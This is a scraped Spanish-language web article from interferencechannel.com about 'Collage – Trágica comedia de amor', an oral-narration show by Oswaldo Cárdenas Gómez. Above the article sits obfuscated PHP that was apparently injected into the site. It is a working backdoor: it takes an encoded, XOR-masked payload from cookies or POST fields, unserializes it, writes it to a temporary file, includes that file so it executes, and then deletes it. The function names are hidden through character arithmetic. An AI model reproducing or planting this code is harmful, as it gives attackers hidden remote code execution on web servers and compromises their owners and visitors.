$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> Collage – Trágica comedia de amor. – www.interferencechannel.com

Collage – Trágica comedia de amor.

COLLAGE      –    TRÁGICA  COMEDIA  DE  AMOR.

https://interferencechannel.files.wordpress.com/2015/09/collage.jpg

¿Y Quién no es adicto al amor?

Collage trágica  comedia de amor, es una película narrada, ganadora del premio de Narración Oral del Ministerio de Cultura 20115, que cuenta la historia de un hombre que se volvió adicto al amor. Nueva pieza del narrador oral Oswaldo Cárdenas Gómez que se estrenó con éxito en el Teatro Municipal de Guadalajara de Buga y seguirá su temporada de estreno en Bogotá y Medellín del 28 de septiembre al 17 de octubre.

Collage trágica comedia de amor, es una apuesta por resignificar la manera en la que se cuentan historias. Oswaldo lleva al público por una experiencia sensitiva: la voz del narrador se mezcla con videos, sonidos, música  y una colcha de retazos hecha a partir de frames de la historia que evocan planos cinematográficos que involucran al espectador de manera directa. En Oswaldo las historias vienen de la oralidad  que se genera creciendo en una ciudad pequeña, de lo cotidiano, de la música, el cine y la literatura. Lo que las hace universales.

Juan, el protagonista de Collage, es un  joven recién graduado que migra desde su pueblo natal a la capital en busca de una mejor vida, pero cuando llega se enfrenta  a un monstruo de ciudad —en la que   siempre llueve— que lo reduce y le rompe todas las cuerdas que lo mantenían en pie, llevándolo a través de una sinfonía de angustia y dolor. Es allí, en medio de la desesperación, donde conoce a Mariana, quién aparece como una microbomba de tiempo que finalmente lleva la  historia a su propio límite. Ella es una joven mujer que tiene la capacidad de morir y regresar de la muerte.   En Collage, Juan y Mariana se encuentran luego de que ella regresa de una de sus muertes; en ese instante la obra se precipita hacia un cielo gacho en el que la historia de amor brilla como una constelación en forma de conejos.

Para la creación del personaje masculino del cuento, Oswaldo tomó como referencia el cuento Carta a una señorita en Paris de Julio Cortázar, especialmente el hombre que vomitaba conejos. Por otro lado, Mariana está inspirada en Cuando vuelvas de tus muertes, cortometraje colombiano del director Carlos Mario Urrea, quien propone a una mujer   que se suicida  constantemente para escapar de los hombres que quieren amarla. Además, como es característico en el trabajo de Oswaldo, la música tiene un papel fundamental en la narración: clásicos de la salsa contrastan el drama de los protagonistas con    el espíritu cómico de cada una de las escenas que componen la historia.

La invitación es para que acompañen a los protagonistas de esta historia a ese ritual eterno de hacer equipajes que no llevan a ninguna parte y en el que los seres humanos tanto insistimos, pues no es otra cosa que la esencia  que define al amor. ¿Y quién no es adicto al amor?.♦

Natalia Castillo Verdugo está vinculada con Interference desde 2014 como columnista.

Comments are closed.